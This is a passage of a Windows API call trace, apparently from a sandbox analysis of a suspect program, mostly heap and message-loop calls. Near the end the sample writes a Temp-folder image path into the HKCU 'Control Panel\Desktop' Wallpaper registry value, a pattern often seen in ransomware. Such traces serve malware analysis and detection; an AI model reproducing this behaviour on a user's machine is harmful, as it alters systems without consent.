hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0278.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0278.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0278.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0278.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0278.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0278.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0278.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0278.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0278.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0278.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0278.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0278.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0278.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0278.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0278.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0278.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0278.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0278.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0278.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0278.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0278.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0278.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0278.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0278.478] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0278.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0278.478] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0278.478] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0278.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0278.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0278.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0278.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0278.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0278.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0278.479] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0278.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0278.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0278.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0278.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0278.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0278.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0278.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0278.480] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0278.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0278.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0278.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0278.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0278.480] timeGetTime () returned 0x1185c76 [0278.480] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.480] Sleep (dwMilliseconds=0xa) [0278.553] timeGetTime () returned 0x1185cbd [0278.553] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.553] Sleep (dwMilliseconds=0xa) [0278.631] timeGetTime () returned 0x1185d0c [0278.631] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0278.631] TranslateMessage (lpMsg=0x8cf798) returned 0 [0278.632] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0278.632] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0278.632] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0278.632] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.632] Sleep (dwMilliseconds=0xa) [0278.703] timeGetTime () returned 0x1185d53 [0278.703] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.703] Sleep (dwMilliseconds=0xa) [0278.788] timeGetTime () returned 0x1185da8 [0278.788] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.788] Sleep (dwMilliseconds=0xa) [0278.932] timeGetTime () returned 0x1185e39 [0278.932] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.932] Sleep (dwMilliseconds=0xa) [0278.990] timeGetTime () returned 0x1185e73 [0278.990] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.990] Sleep (dwMilliseconds=0xa) [0279.045] timeGetTime () returned 0x1185eaa [0279.045] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.045] Sleep (dwMilliseconds=0xa) [0279.110] timeGetTime () returned 0x1185eeb [0279.110] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.110] Sleep (dwMilliseconds=0xa) [0279.182] timeGetTime () returned 0x1185f33 [0279.182] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.182] Sleep (dwMilliseconds=0xa) [0279.218] timeGetTime () returned 0x1185f57 [0279.218] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.218] Sleep (dwMilliseconds=0xa) [0279.254] timeGetTime () returned 0x1185f7a [0279.254] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.254] Sleep (dwMilliseconds=0xa) [0279.291] timeGetTime () returned 0x1185fa0 [0279.291] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.291] Sleep (dwMilliseconds=0xa) [0279.329] timeGetTime () returned 0x1185fc6 [0279.329] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.329] Sleep (dwMilliseconds=0xa) [0279.366] timeGetTime () returned 0x1185feb [0279.367] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.367] Sleep (dwMilliseconds=0xa) [0279.526] timeGetTime () returned 0x118608b [0279.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0279.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0279.526] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0279.526] TranslateMessage (lpMsg=0x8cf968) returned 0 [0279.526] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0279.527] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0279.527] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0279.527] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0279.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0279.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0279.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0279.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0279.527] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0279.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0279.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0279.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0279.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0279.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0279.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0279.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0279.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0279.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0279.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0279.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0279.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0279.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0279.529] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0279.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0279.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0279.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0279.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0279.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0279.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0279.529] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0279.530] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0279.530] RegCloseKey (hKey=0x2d0) returned 0x0 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0279.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0279.531] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0279.531] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0279.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0279.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0279.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0279.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0279.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0279.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 